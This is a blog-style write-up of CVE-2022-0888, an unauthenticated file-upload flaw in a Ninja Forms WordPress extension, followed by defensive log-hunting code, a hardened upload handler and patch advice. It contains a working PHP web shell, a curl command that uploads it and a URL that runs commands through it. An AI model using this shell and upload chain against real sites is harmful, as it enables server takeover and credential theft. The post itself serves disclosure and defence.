In early 2022, a critical vulnerability shook the WordPress ecosystem, affecting websites using the popular Ninja Forms - File Uploads Extension plugin. Tracked as CVE-2022-0888, the flaw lets unauthenticated attackers upload files of any type, slip past the plugin's weak server-side checks, and ultimately execute code on the hosting server. In plain terms: an attacker could take over a WordPress site without ever logging in.
This post breaks down how CVE-2022-0888 works, walks through exploitation with code snippets, and ends with references. Let's get started!
What is the Ninja Forms - File Uploads Extension?
Ninja Forms is a widely-used WordPress plugin for building forms—contact forms, application forms, and more. The File Uploads Extension lets users attach files when submitting a form.
Normally, you want to allow common file types (like .jpg or .pdf) but block dangerous ones such as .php scripts, because the web server will execute those rather than serve them.
The Issue
The vulnerability lives in the extension's AJAX upload controller:
~/includes/ajax/controllers/uploads.php
This file failed to properly validate file types before saving uploads to disk. An attacker could trick the upload logic into storing any file type they want on your server, including executable PHP code.
Why does this matter?
Because if you can upload a file like shell.php into a web-accessible directory and then request it, the server runs it as PHP with the web server's privileges. From there you can make the server do almost anything: list files, delete data, read wp-config.php for the database credentials, and so on.
Upload a Malicious File
Use a tool like curl or Burp Suite to submit a crafted form submission. The plugin's checks are weak enough that changing the Content-Type or the filename in the multipart body gets the file through.
Access the Uploaded File
The file lands in a public directory, such as /wp-content/uploads/ninja-forms/ or similar. Requesting http://victim-site.com/wp-content/uploads/ninja-forms/shell.php makes the server execute the uploaded code.
Below is a minimal PHP web shell for a proof of concept:
```php
<?php
// Runs whatever arrives in the "cmd" parameter (GET, POST or cookie) through
// the system shell and returns its output wrapped in <pre>.
if (isset($_REQUEST['cmd'])) {
    echo '<pre>' . shell_exec($_REQUEST['cmd']) . '</pre>';
}
?>
```
Upload this as shell.php via the vulnerable form.
Example curl Command
```bash
# Multipart POST of the shell to the plugin's AJAX endpoint; the URL is quoted
# so the shell does not treat the "?" as a glob character.
curl -F "file=@shell.php" "https://victim-site.com/wp-admin/admin-ajax.php?action=ninja_forms_ajax_submit"
```
*(You may need to adjust the field names, the action, or the path to match the target form's structure.)*
Now, execute a command
Visit:
https://victim-site.com/wp-content/uploads/ninja-forms/shell.php?cmd=whoami
If the response is something like www-data, the exploit worked: the attacker can now run any command the web server's user is allowed to run.
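What this looks like from the defender's side, as an added example that is not part of the original post: a small PHP script that scans a combined-format access log for requests that execute a PHP file out of the uploads tree (uploads should never serve PHP) and ties each one to the most recent form-submission POST from the same client. The log lines are constructed for the example; the admin-ajax action name is the one used in the curl command above. It assumes PHP 8 (for str_starts_with), and example_find_upload_execution is a hypothetical name.

```php
<?php
// Added example, not the plugin's or the post author's code. Log lines below are
// constructed; IPs come from the documentation ranges.
const EXAMPLE_LOG = <<<'LOG'
203.0.113.10 - - [23/Mar/2022:20:15:01 +0000] "POST /wp-admin/admin-ajax.php?action=ninja_forms_ajax_submit HTTP/1.1" 200 312 "-" "curl/7.81.0"
203.0.113.10 - - [23/Mar/2022:20:15:04 +0000] "GET /wp-content/uploads/ninja-forms/shell.php?cmd=whoami HTTP/1.1" 200 41 "-" "curl/7.81.0"
198.51.100.7 - - [23/Mar/2022:20:16:10 +0000] "GET /wp-content/uploads/2022/03/logo.png HTTP/1.1" 200 8812 "https://victim-site.com/" "Mozilla/5.0"
198.51.100.7 - - [23/Mar/2022:20:16:11 +0000] "POST /wp-admin/admin-ajax.php?action=ninja_forms_ajax_submit HTTP/1.1" 200 290 "https://victim-site.com/contact/" "Mozilla/5.0"
LOG;

/**
 * Parse a combined-format access log and return every request for a
 * PHP-executable file under /wp-content/uploads/, each paired with the most
 * recent earlier admin-ajax POST from the same client IP (null if none).
 */
function example_find_upload_execution(string $log): array
{
    $line_re = '/^(?<ip>\S+) \S+ \S+ \[(?<ts>[^\]]+)\] "(?<method>[A-Z]+) (?<path>\S+)[^"]*" (?<status>\d{3})/';
    // Path component (query string already stripped) ending in an extension
    // that common PHP handler configurations will execute.
    $php_under_uploads = '#^/wp-content/uploads/.*\.(?:php[0-9]?|phtml|phar)$#i';

    $last_post = [];   // ip => most recent admin-ajax POST line seen
    $hits = [];
    foreach (preg_split('/\R/', trim($log)) as $line) {
        if (!preg_match($line_re, $line, $m)) {
            continue;   // not a combined-format line; skip rather than guess
        }
        $path = strtok($m['path'], '?');
        if ($m['method'] === 'POST' && str_starts_with($path, '/wp-admin/admin-ajax.php')) {
            $last_post[$m['ip']] = $line;
            continue;
        }
        if (preg_match($php_under_uploads, $path)) {
            $hits[] = [
                'ip'             => $m['ip'],
                'time'           => $m['ts'],
                'path'           => $m['path'],
                'status'         => (int) $m['status'],
                'preceding_post' => $last_post[$m['ip']] ?? null,
            ];
        }
    }
    return $hits;
}

foreach (example_find_upload_execution(EXAMPLE_LOG) as $hit) {
    printf(
        "[%s] %s requested %s (HTTP %d)%s\n",
        $hit['time'], $hit['ip'], $hit['path'], $hit['status'],
        $hit['preceding_post'] !== null ? ' after a form POST from the same IP' : ''
    );
}
```

Run it with `php hunt.php` against a real log by replacing the constant with `file_get_contents('/var/log/apache2/access.log')`. The second log line is the only hit: the first is the upload, the third is a legitimate image, and the fourth is an ordinary form submission with no PHP request after it. A 200 status on the hit means the server executed the file; a 403 or 404 there is also worth looking at, because it shows someone tried.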
Why Did the Filter Fail?
In uploads.php, the upload handler tried to block dangerous files by checking the file extension or MIME type. The trouble is that both values come straight from the request, so the attacker controls them. A simplified version of such a handler looks like this:
```php
<?php
// Weak file type check (simplified): the only gate is the extension of the
// client-supplied filename, and the file is stored under that same name.
$allowed = array('jpg', 'png', 'pdf');
$file_ext = pathinfo($_FILES['file']['name'], PATHINFO_EXTENSION);
// Hypothetical destination; the real path is built by the plugin.
$target_path = '/var/www/html/wp-content/uploads/ninja-forms/' . $_FILES['file']['name'];
if (in_array($file_ext, $allowed)) {
    move_uploaded_file($_FILES['file']['tmp_name'], $target_path);
}
```
Because the decision rests solely on the characters after the last dot of a name the attacker chooses, it can be beaten by a manipulated request: shell.php.png passes the check as a PNG, and the attacker then needs only a server that executes it anyway (Apache with AddHandler considers every extension in a name, so a .php.png file can still be handed to PHP) or a second bug, such as path traversal in the filename, that strips the trailing .png. The check never looks at the file's bytes, so the Content-Type header and the actual contents play no part in it.
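A hardened version of that handler, added here as an example rather than the plugin's actual fix (the patched extension's code is not shown in this post). It assumes PHP 8 with the fileinfo extension loaded; example_store_upload, EXAMPLE_ALLOWED_TYPES and the destination directory are hypothetical names chosen for the example.

```php
<?php
// Added example, not the plugin's code. Each numbered step closes one gap in
// the extension-only check shown above.

// Allow-list keyed by lower-cased extension, mapping to the MIME types the
// file's *contents* must actually have. The extension is only half the decision.
const EXAMPLE_ALLOWED_TYPES = [
    'jpg'  => ['image/jpeg'],
    'jpeg' => ['image/jpeg'],
    'png'  => ['image/png'],
    'pdf'  => ['application/pdf'],
];

/**
 * Validate one entry of $_FILES and, if it passes, move it into $upload_dir
 * under a server-generated name. Returns the stored path, or null on rejection.
 */
function example_store_upload(array $file, string $upload_dir): ?string
{
    // 1. Reject anything PHP itself reported as a failed or partial upload,
    //    and anything that did not arrive through the upload mechanism.
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK
        || !is_uploaded_file($file['tmp_name'] ?? '')) {
        return null;
    }

    // 2. Extension: judge only the *last* extension, lower-cased, so "shell.PHP"
    //    and "shell.php.png" are compared by what follows the final dot.
    $name = basename((string) $file['name']);   // drop any path component
    $ext  = strtolower(pathinfo($name, PATHINFO_EXTENSION));
    if (!isset(EXAMPLE_ALLOWED_TYPES[$ext])) {
        return null;
    }

    // 3. Content: sniff the bytes with fileinfo. $_FILES['type'] is set by the
    //    client and is never consulted.
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    $mime  = $finfo->file($file['tmp_name']);
    if (!in_array($mime, EXAMPLE_ALLOWED_TYPES[$ext], true)) {
        return null;
    }

    // 4. Name: never reuse the client's filename. A random name with a single,
    //    allow-listed extension removes double-extension tricks, traversal
    //    characters and URL guessing in one step.
    $stored = bin2hex(random_bytes(16)) . '.' . $ext;
    $target = rtrim($upload_dir, '/') . '/' . $stored;

    if (!move_uploaded_file($file['tmp_name'], $target)) {
        return null;
    }
    // 5. No execute bits on the stored file; the directory itself should also
    //    be configured so the web server never runs scripts from it.
    chmod($target, 0644);
    return $target;
}

// Usage with a hypothetical form field named "file":
// $path = example_store_upload($_FILES['file'], '/var/www/html/wp-content/uploads/ninja-forms');
// if ($path === null) {
//     http_response_code(400);
//     exit('Upload rejected');
// }
```

Step 5 is the defence that survives even when steps 2 to 4 are wrong: on Apache, an .htaccess in the uploads directory containing `<FilesMatch "\.ph(p[0-9]?|tml|ar)$">` `Require all denied` `</FilesMatch>` refuses to serve PHP files there at all, and nginx can do the same with a location block that returns 403 for `\.php$` under /wp-content/uploads/. With that in place, an uploaded shell.php is just a file that nobody can run.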
Check your plugin version! If you run an affected release of the File Uploads Extension, apply the fix below before doing anything else.
### Fix / Patch
Upgrade to the latest version of the extension immediately:
Ninja Forms Download Page
The Ninja Forms team patched this in later releases by implementing strict file type validation on the server side.
Original Disclosure:
CVE Record:
Plugin Homepage:
Final Thoughts
Arbitrary file upload vulnerabilities are among the most dangerous a WordPress site can have: they hand an attacker the keys to your hosting server. Always:
Use security plugins and a web application firewall, and make sure the web server cannot execute scripts from the uploads directory.
If you manage a WordPress site, patch CVE-2022-0888 now, and review your installed plugins regularly!
*Stay safe, patch smart, and always validate those uploads on the server!*
Timeline
Published on: 03/23/2022 20:15:00 UTC
Last modified on: 05/02/2022 19:34:00 UTC